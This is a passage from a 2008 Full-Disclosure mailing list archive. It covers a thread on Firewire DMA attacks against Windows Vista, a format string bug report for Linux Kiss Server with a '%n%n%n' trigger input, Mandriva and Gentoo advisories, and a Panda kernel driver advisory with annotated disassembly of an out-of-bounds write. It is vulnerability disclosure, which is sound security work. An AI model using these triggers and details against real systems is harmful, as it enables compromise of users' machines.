Vista In-Reply-To: References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> Let's say the computer is off. You can turn it on, but that gets you to a login screen. What can the Firewire device do? 
Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From Larry at larryseltzer.com Fri Mar 7 19:51:07 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Fri, 7 Mar 2008 14:51:07 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> >>Let's say the computer is off. You can turn it on, but that gets you to a login screen. What can the Firewire device do? OK, I guess I misunderstood the original paper (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf). It now looks to me like they are claiming they can disable password authentication *even while the system is not logged on* - do I have that right?
Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From thor at hammerofgod.com Fri Mar 7 19:55:19 2008 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Fri, 7 Mar 2008 11:55:19 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> Message-ID: The main point is to grab encryption keys from memory where the drive is encrypted - but that has to be while the device is on. I mean, it doesn't really matter if you disable password auth when you have physical access as you can just take the drive out, boot from CD, etc... t > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer > Sent: Friday, March 07, 2008 11:51 AM > To: Bugtraq; Full Disclosure > Subject: Re: [Full-disclosure] Firewire Attack on Windows Vista > > >>Let's say the computer is off. You can turn it on, but that gets you > to a login screen. What can the Firewire device do? > > OK, I guess I misunderstood the original paper > (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf). It now looks to me like they are claiming they can disable > password authentication *even while the system is not logged on* - do I > have that right?
> > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From vashnukad1 at gmail.com Fri Mar 7 21:05:02 2008 From: vashnukad1 at gmail.com (vashnukad vashnukad) Date: Fri, 7 Mar 2008 16:05:02 -0500 Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2 In-Reply-To: References: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com> Message-ID: I have not yet notified the vendors. -- Name: Vashnukad e-mail: vashnukad at vashnukad.com Site: http://www.vashnukad.com > On 3/5/08, David Judais wrote: > > Why isn't there a patch? > > > > > From: vashnukad at vashnukad.com > > > > > Site: http://www.vashnukad.com > > > > Application: Linux Kiss Server v1.2 > > > > Type: Format strings > > > > Priority: Medium > > > > Patch available: No > > > > > > The Linux Kiss Server contains a format strings vulnerability that, if run > > in foreground mode, can be leveraged for access. The vulnerability is > > demonstrated in the code below: > > > > Function log_message(): > > > > if(background_mode == 0) > > > > { > > > > if(type == 'l') > > > > fprintf(stdout,log_msg); > > > > > > if(type == 'e') > > > > fprintf(stderr,log_msg); > > > > free(log_msg); > > > > } > > > > > > > > > > Function kiss_parse_cmd(): > > > > > > > > /* check full command name */ > > > > if (strncmp(cmd, buf, cmd_len)) > > > > { > > > > asprintf(&log_msg,"unknow command: `%s'", buf); > > > > log_message(log_msg,'e'); > > > > goto error; > > > > } > > > > buf += cmd_len; > > > > > > > > So putting something like %n%n%n in 'buf' you can trigger the > vulnerability. 
> > > > > > -- > > > > Name: Vashnukad > > > > E-mail: vashnukad at vashnukad.com > > > > Site: http://www.vashnukad.com > > > > > > > > > > -- > > > > Name: Vashnukad > > > > e-mail: vashnukad at vashnukad.com > > > > Site: http://www.vashnukad.com > > > From security at mandriva.com Fri Mar 7 21:06:13 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 07 Mar 2008 14:06:13 -0700 Subject: [Full-disclosure] [ MDVSA-2008:064 ] - Updated tomboy packages fix improper LD_LIBRARY_PATH handling Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:064 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tomboy Date : March 7, 2008 Affected: 2007.1, 2008.0 _______________________________________________________________________ Problem Description: A flaw in how tomboy handles LD_LIBRARY_PATH was discovered where by appending paths to LD_LIBRARY_PATH the program would also search the current directory for shared libraries. In directories containing network data, those libraries could be injected into the application. The updated packages have been patched to correct this issue. 
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4790 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: e4fec795476776d6cdeb2b875dde8c17 2007.1/i586/tomboy-0.6.1-3.1mdv2007.1.i586.rpm b3f45b1dfc59d49c770529b1d2458c61 2007.1/SRPMS/tomboy-0.6.1-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: a73e1c14a26e577b6306b70ff2084e74 2007.1/x86_64/tomboy-0.6.1-3.1mdv2007.1.x86_64.rpm b3f45b1dfc59d49c770529b1d2458c61 2007.1/SRPMS/tomboy-0.6.1-3.1mdv2007.1.src.rpm Mandriva Linux 2008.0: e200a429f743429bfd741ce9f8c71152 2008.0/i586/tomboy-0.8.0-1.1mdv2008.0.i586.rpm 54b18c82a1f0037a94c394a0203cb3bc 2008.0/SRPMS/tomboy-0.8.0-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 6698979ccf4f777c5111794f63a82604 2008.0/x86_64/tomboy-0.8.0-1.1mdv2008.0.x86_64.rpm 54b18c82a1f0037a94c394a0203cb3bc 2008.0/SRPMS/tomboy-0.8.0-1.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. 
You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH0YOhmqjQ0CJFipgRAgSmAJ9otgdVwjfflVe6jpml6bwdnSEqRQCg47aY Q2rEjKTOGDGKOt2GK6QFVE4= =2bbj -----END PGP SIGNATURE----- From py at gentoo.org Fri Mar 7 23:17:12 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Sat, 08 Mar 2008 00:17:12 +0100 Subject: [Full-disclosure] [ GLSA 200803-13 ] VLC: Multiple vulnerabilities Message-ID: <47D1CCF8.7090302@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: VLC: Multiple vulnerabilities Date: March 07, 2008 Bugs: #203345, #211575, #205299 ID: 200803-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in VLC, allowing for the execution of arbitrary code and Denial of Service. Background ========== VLC is a cross-platform media player and streaming server. 
Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /  Unaffected
    -------------------------------------------------------------------
  1  media-video/vlc     < 0.8.6e       >= 0.8.6e

Description
===========

Multiple vulnerabilities were found in VLC:

* Michal Luczaj and Luigi Auriemma reported that VLC contains boundary errors when handling subtitles in the ParseMicroDvd(), ParseSSA(), and ParseVplayer() functions in the modules/demux/subtitle.c file, allowing for a stack-based buffer overflow (CVE-2007-6681).

* The web interface listening on port 8080/tcp contains a format string error in the httpd_FileCallBack() function in the network/httpd.c file (CVE-2007-6682).

* The browser plugin possibly contains an argument injection vulnerability (CVE-2007-6683).

* The RTSP module triggers a NULL pointer dereference when processing a request without a "Transport" parameter (CVE-2007-6684).

* Luigi Auriemma and Remi Denis-Courmont found a boundary error in the modules/access/rtsp/real_sdpplin.c file when processing SDP data for RTSP sessions (CVE-2008-0295) and a vulnerability in the libaccess_realrtsp plugin (CVE-2008-0296), possibly resulting in a heap-based buffer overflow.

* Felipe Manzano and Anibal Sacco (Core Security Technologies) discovered an arbitrary memory overwrite vulnerability in VLC's MPEG-4 file format parser (CVE-2008-0984).

Impact
======

A remote attacker could send a long subtitle in a file that a user is enticed to open, a specially crafted MP4 input file, long SDP data, or a specially crafted HTTP request with a "Connection" header value containing format specifiers, possibly resulting in the remote execution of arbitrary code. Also, a Denial of Service could be caused and arbitrary files could be overwritten via the "demuxdump-file" option in a filename in a playlist or via an EXTVLCOPT statement in an MP3 file.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All VLC users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/vlc-0.8.6e"

References
==========

  [ 1 ] CVE-2007-6681
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6681
  [ 2 ] CVE-2007-6682
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6682
  [ 3 ] CVE-2007-6683
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6683
  [ 4 ] CVE-2007-6684
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6684
  [ 5 ] CVE-2008-0295
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0295
  [ 6 ] CVE-2008-0296
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0296
  [ 7 ] CVE-2008-0984
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0984

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFH0cz4uhJ+ozIKI5gRAku2AJ48uLioRmDL3ULyqGRGGQJQj0A0YACgowss NSRHQSa+5Fq4jOY2CxzrRuU= =pnZh -----END PGP SIGNATURE----- From kain at kain.org Fri Mar 7 21:53:40 2008 From: kain at kain.org (Bryon Roche) Date: Fri, 7 Mar 2008 21:53:40 +0000 (UTC) Subject: [Full-disclosure] Firewire Attack on Windows Vista References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> Message-ID: On Fri, 07 Mar 2008 14:51:07 -0500, Larry Seltzer wrote: >>>Let's say the computer is off. You can turn it on, but that gets you > to a login screen. What can the Firewire device do? > > OK, I guess I misunderstood the original paper > (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks > .pdf). It now looks to me like they are claiming they can disable > password authentication *even while the system is not logged on* - do I > have that right? Larry, Are you familiar with ICE or JTAG debugging hardware? ieee1394 is implemented by default in such a fashion that a ieee1394 port can basically be used as a hardware debugger to memory. i.e. any ieee1394 device can poke/peek the entire _physical memory space_ of any other device on the bus. With that capability you can do anything that could be accomplished from the internals of the operating system. The essential flaw here is that current SBP-2 drivers do not set up a proper virtual memory map between the firewire chipset and the host, and just expose the entire host's physical address space. 
Fixing this requires reimplementing a good deal of design and buffering for the SBP-2 (that's the firewire SCSI block protocol) drivers. I however, don't know enough about windows drivers and disk access to elaborate from there about how hard that will be to fix in the windows world. What people seem to be missing is that this condition is *fixable*, but the real impetus may not be there outside of folks from the Trusted Computing crowd etc etc. What points are you trying to stab at for an article? From Larry at larryseltzer.com Sat Mar 8 12:12:32 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sat, 8 Mar 2008 07:12:32 -0500 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F29@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE252F2B@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F35@becca.LarrySeltzer.local> >>What points are you trying to stab at for an article? You've hit on them pretty well. My own experience with DMA programming was 20 years ago with real mode DOS drivers, but I was surprised to learn from this thread that a DMA mass storage device on Linux, Mac and Windows gets unimpeded access to the full stretch of system memory. I take what I read here with a grain of salt, but the non-nut cases seem to be out and in agreement, at least about that. I'm not going to be writing a 20 page paper. I think I have 2 main questions I'll write about: How much should you worry about this and is it fixable (beyond disabling DMA, which is not a good solution if you ask me). 
You say it's fixable; that still leaves some questions for me whether the fix comes at the expense just of additional sophistication in the Firewire drivers or also a performance burden. I'll probably just leave it at a question. I actually do have a response from Microsoft on the broader issue, but it doesn't address these issues or even concede that there's necessarily anything they can do about it. They instead speak of the same precautions for physical access that they spoke of a couple weeks ago with respect to the "frozen notebook memory" attack - use drive encryption, use 2-factor authentication, use hibernate instead of sleep, use group policy to enforce them. I don't think it's a bad response under the circumstances. The fact that you can turn off DMA on Linux seems in fact inferior to simply disabling the Firewire port and driver at run-time in Windows. They both suck as solutions. Incidentally, Microsoft made a few other points in their response that were interesting, but raised more questions than they answered:

* it's possible for a user to disable 1394 DMA. I'm still looking into how you can do this.

* it's possible for a user to "constrain a DMA device's memory access to specific ranges by using the physical DMA type." They say that some devices cannot be so restricted at all, and for others the restriction would only come at the cost of additional complexity and a performance hit, as I allude to above. I assume these considerations are generic to the hardware and not specific to Windows.

How much should the average user worry about this? Not very much. Most notebooks from average users don't even have Firewire on them and you would have an easier time cracking them with a dictionary attack on the password and other such things, which means that this attack makes you no more vulnerable to compromise if you've already granted physical access than you were before.
The frozen notebook memory attack seems a little too Mission Impossible for me to get worked up about. And if you're the sort of high-value target who needs to worry about this sort of attack, there are measures you can take: use drive encryption, use 2-factor authentication, use hibernate instead of sleep, use group policy to enforce them. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com

From tk at trapkit.de Sat Mar 8 13:16:30 2008 From: tk at trapkit.de (Tobias Klein) Date: Sat, 8 Mar 2008 14:16:30 +0100 (MET) Subject: [Full-disclosure] [TKADV2008-001] Panda Internet Security/Antivirus+Firewall 2008 cpoint.sys Kernel Driver Memory Corruption Vulnerability Message-ID: <200803081316.m28DGUEl000867@post.webmailer.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:               Panda Internet Security/Antivirus+Firewall 2008 cpoint.sys Kernel Driver Memory Corruption Vulnerability
Advisory ID:            TKADV2008-001
Revision:               1.0
Release Date:           2008/03/08
Last Modified:          2008/03/08
Date Reported:          2008/01/08
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      Panda Internet Security 2008
                        Panda Antivirus+Firewall 2008
Remotely Exploitable:   No
Locally Exploitable:    Yes
Vendor URL:             http://www.pandasecurity.com
Vendor Status:          Vendor has released a hotfix
Patch development time: 60 days

======================
Vulnerability details:
======================

The kernel driver cpoint.sys shipped with Panda Internet Security and Antivirus+Firewall 2008 contains a vulnerability in the code that handles IOCTL requests. Exploitation of this vulnerability can result in:

1) local denial of service attacks (system crash due to a kernel panic), or
2) local execution of arbitrary code at the kernel level (complete system compromise)

The issue can be triggered by sending a specially crafted IOCTL request.
No special user rights are necessary to exploit the vulnerability.

======================
Technical description:
======================

The IOCTL call 0xba002848 of the cpoint.sys kernel driver shipped with Panda Internet Security/Antivirus+Firewall 2008 accepts user supplied input that doesn't get validated enough. In consequence it is possible to cause an out-of-bound write in kernel memory.

Disassembly of cpoint.sys (Windows Vista 32bit version):

[...]
.text:00012633 loc_12633:
.text:00012633     mov     edx, 0BA002848h                  <-- (1)
.text:00012638     cmp     ecx, edx
.text:0001263A     ja      loc_12946
[...]
.text:00012640     jz      loc_128BE
[...]
.text:000128BE loc_128BE:
.text:000128BE     cmp     [ebp+IOCTL_INPUT_SIZE], 1008h    <-- (2)
.text:000128C5     jb      loc_12A7D
[...]
.text:000128CB     mov     esi, [ebp+IOCTL_INPUT_DATA]      <-- (3)
.text:000128CE     cmp     dword ptr [esi], 3F256B9Ah       <-- (4)
.text:000128D4     jnz     loc_12A7D
[...]
.text:000128FF     xor     eax, eax
.text:00012901     cmp     [esi+8], eax                     <-- (5)
.text:00012904     jbe     short loc_1291B
[...]

(1) Vulnerable IOCTL call
(2) IOCTL input size check
(3) The user supplied data is copied into esi
(4) + (5) Minor input data checks

From this point there are two different vulnerable code paths. Both will be described in the following:

Vulnerable code path 1:

[...]
.text:00012906     lea     ecx, [esi+0Ch]                   <-- (6)
[...]
.text:00012909 loc_12909:
.text:00012909     mov     edx, [ecx]                       <-- (7)
.text:0001290B     mov     OVERWRITTEN_DATA[eax*4], edx     <-- (8)
.text:00012912     inc     eax
.text:00012913     add     ecx, 4
.text:00012916     cmp     eax, [esi+8]                     <-- (9)
.text:00012919     jb      short loc_12909
[...]

(6) Some user controlled data is copied into ecx
(7) The user controlled data is copied into edx
(8) The user controlled data is copied (as dwords) at the memory location OVERWRITTEN_DATA
(9) The size of the copied data (loop counter in eax) can be controlled by the user

This leads to an out-of-bound write in kernel memory.

Vulnerable code path 2:

[...]
.text:0001291B loc_1291B:
.text:0001291B     xor     eax, eax
.text:0001291D     cmp     [esi+10Ch], eax                  <-- (10)
.text:00012923     jbe     loc_129B4
[...]
.text:00012929     lea     ecx, [esi+110h]                  <-- (11)
[...]
.text:0001292F loc_1292F:
.text:0001292F     mov     edx, [ecx]                       <-- (12)
.text:00012931     mov     OVERWRITTEN_DATA2[eax*4], edx    <-- (13)
.text:00012938     inc     eax
.text:00012939     add     ecx, 4
.text:0001293C     cmp     eax, [esi+10Ch]                  <-- (14)
.text:00012942     jb      short loc_1292F
[...]

(10) Minor check of the user controlled data
(11) Some user controlled data is copied into ecx
(12) The user controlled data is copied into edx
(13) The user controlled data is copied (as dwords) at the memory location OVERWRITTEN_DATA2
(14) The size of the copied data (loop counter in eax) can be controlled by the user

This leads to an out-of-bound write in kernel memory.

In both cases it is possible to write an arbitrary amount of user controlled data into kernel memory. As the data that gets overwritten is in the data